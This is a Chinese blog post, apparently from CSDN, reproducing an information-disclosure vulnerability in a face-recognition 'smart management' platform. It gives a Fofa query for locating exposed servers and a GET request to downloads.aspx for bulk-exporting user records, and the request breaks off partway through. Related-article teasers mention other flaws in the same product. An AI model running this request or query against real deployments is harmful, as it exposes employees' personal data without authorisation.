【漏洞复现】脸爱云一脸通智慧管理平台downloads信息泄露漏洞

已于 2024-04-24 16:39:00 修改
阅读量343 收藏
点赞数 8
文章标签: web安全
于 2024-04-24 16:38:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/138163145
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

漏洞描述:

深圳市优卡特电子有限公司脸爱云一脸通智慧管理平台downloads.aspx存在信息泄露漏洞,攻击者可以通过此漏洞获取当前系统用户敏感信息。

搜索语法:

Fofa-Query: body="View/UserReserved/UserReservedTest.aspx"

漏洞详情:

1.脸爱云一脸通智慧管理平台。

2.漏洞POC:

GET /downloads.aspx?Ename=UserInfo&total=1000&jsonParam={%22rybh%22:%22%22,%22ryxm%22:%22%22,%22EngName%22:%22%22,%22groupname%22:%22%22,%22companyname%22:%22%22,%22bmmc%22:%22%22,%22ryzt%22:%22%22,%22rzstartime%22:%22%22,%22rzendtime%22:%22%22,%22lzstartime%22:%22%22,%22lzendtime%22:%22%22,%22zhiwu%22:%22%22,%22cardid%22:%22%22,%22rfzt%22:%22%22,%22klb%22:%22%22,%22sxstartime%22:%22%22,%22sxendtime%22:%22%22,%22khstartime%22:%22%22,%22khendtime%22
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

脸爱云一脸智慧管理平台 SystemMng 管理用户信息泄露漏洞(XVE-2024-9382)
0xSec
05-01 531
脸爱云一脸智慧管理平台存在信息泄露漏洞,该漏洞源于SystemMng.ashx接口处存在信息泄露漏洞,攻击者能够利用该漏洞过SelOperators参数泄露的当前管理员的敏感信息包括账号密码登录系统后台。
漏洞复现脸爱云一脸智慧管理平台SelOperators信息泄露漏洞
晚风不及你
04-24 78
深圳市优卡特电子有限公司脸爱云一脸智慧管理平台存在SelOperators信息泄露漏洞,攻击者可以过此漏洞获取当前系统用户敏感信息
精益价值管理系统 DownLoad.aspx存在任意文件读取漏洞
qq_39894062的博客
05-24 739
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!该系统过集成先进的数据分析工具、可视化的价值流映射技术和灵活的流程改善机制,帮助企业实现高效、低耗、高质量的生产和服务。本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。
漏洞复现脸爱云一脸智慧平台-文件上传-UpLoadPic
知黑而守白
06-19 14
脸爱云一脸智慧平台是一项整合了人脸识别技术和智能化解决方案的综合性平台过脸部识别技术,该平台可以实现识别和管理个体身份,为各种场景提供便捷的身份验证和管理功能。同时,结合了智能化的算法和平台支持,脸爱云一脸智慧平台能够在安防、门禁、考勤等领域发挥重要作用,提升管理效率和安全性。脸爱云一脸智慧平台UpLoadPic.ashx接口处存在文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 571
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
漏洞复现脸爱云一脸智慧管理平台 SystemMng 管理用户信息泄露漏洞(XVE-2024-9382)
最新发布
siu~
06-24 399
脸爱云一脸智慧管理平台存在信息泄露漏洞,该漏洞源于SystemMng.ashx接口处存在信息泄露漏洞,攻击者能够利用该漏洞过SelOperators参数泄露的当前管理员的敏感信息,包括账号密码登录系统后台。
漏洞复现脸爱云一脸智慧平台-信息泄露-SystemMng
知黑而守白
06-19 18
脸爱云一脸智慧平台是一项整合了人脸识别技术和智能化解决方案的综合性平台过脸部识别技术,该平台可以实现识别和管理个体身份,为各种场景提供便捷的身份验证和管理功能。同时,结合了智能化的算法和平台支持,脸爱云一脸智慧平台能够在安防、门禁、考勤等领域发挥重要作用,提升管理效率和安全性。脸爱云一脸智慧平台接口处存在信息泄露漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如账号密码等。
信息安全技术:文件包含漏洞简介.pptx
11-01
总之,理解并防范文件包含漏洞对于保障信息系统安全至关重要。开发者应当意识到,任何用户可控制的数据都有潜在的安全风险,因此必须采取适当的措施来限制这种风险,确保系统的稳定和数据的完整性。
学生信息管理系统简单版(包含架构图)
04-21
学生信息管理,包括学生、班级、院系、课程、成绩等的管理。 本程序仅供学习食用。(¯﹃¯) ## 工程环境 * [JDK](http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html) * ...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC ...1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
StackGuard 漏洞
12-05
StackGuard 漏洞 StackGuard 是一种用来防止堆栈溢出攻击的编译器,由 Crispin Cowan 及 ImmuniX 开发小组维护。用它编译的程序可以有效的防止堆栈溢出问题。它的工作原理是在调用函数时,将返回地址压栈后,再将一...
漏洞复现】优卡特脸爱云一脸智慧管理平台信息泄露漏洞
晚风不及你
01-11 620
脸爱云一脸智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸系统。无需安装,只需在后台配置即可在浏览器登录。功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁管理子系统、会议签到管理子系统、访客管理子系统。
优卡特脸爱云一脸智慧管理平台权限绕过漏洞复现【CVE-2023-6099】
holyxp的博客
11-20 760
脸爱云一脸智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸系统。无需安装,只需在后台配置即可在浏览器登录。功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁管理子系统、会议签到管理子系统、访客管理子系统。
【CVE-2023-6099】优卡特脸爱云一脸智慧管理平台权限绕过漏洞(2023年11月发布)
m0_73896875的博客
11-22 917
优卡特脸爱云一脸智慧管理平台/SystemMng.ashx接口处存在权限绕过漏洞过输入00操纵参数operatorRole,导致特权管理不当,未经身份认证的攻击者可以过此漏洞创建超级管理员账户,造成信息泄露和后台接管漏洞等级高危影响版本漏洞类型身份认证绕过。
优卡特脸爱云一脸智慧管理平台权限绕过漏洞复现(CVE-2023-6099)
0xSec
11-19 788
脸爱云一脸智慧管理平台/SystemMng.ashx接口处存在权限绕过漏洞过输入00操纵参数operatorRole,导致特权管理不当,未经身份认证的攻击者可以过此漏洞创建超级管理员账户,造成信息泄露和后台接管
脸爱云一脸智慧管理平台未授权访问
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-23 905
脸爱云一脸智慧管理平台存在严重漏洞,允许攻击者过未经授权的访问,在系统中任意添加用户。攻击者可滥用此漏洞创建虚假账户,提升权限,或执行其他危险操作。成功利用漏洞可能导致未经授权的系统访问,危及用户隐私和整体系统安全
vulhub thinkPHP5 SQL注入&&敏感信息泄露漏洞复现
weixin_53696027的博客
05-22 704
关于vulhub中thinkPHP SQL注入的漏洞复现及其简单的原理介绍
优卡特脸爱云一脸智慧平台 UpLoadPic.ashx 文件上传致RCE漏洞复现
0xSec
04-29 371
脸爱云一脸智慧管理平台/UpLoadPic.ashx接口处存在文件上传漏洞,未经身份认证的攻击者可以过此漏洞上传恶意后门文件,造成信息泄露和后台接管(edu刷分神洞)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值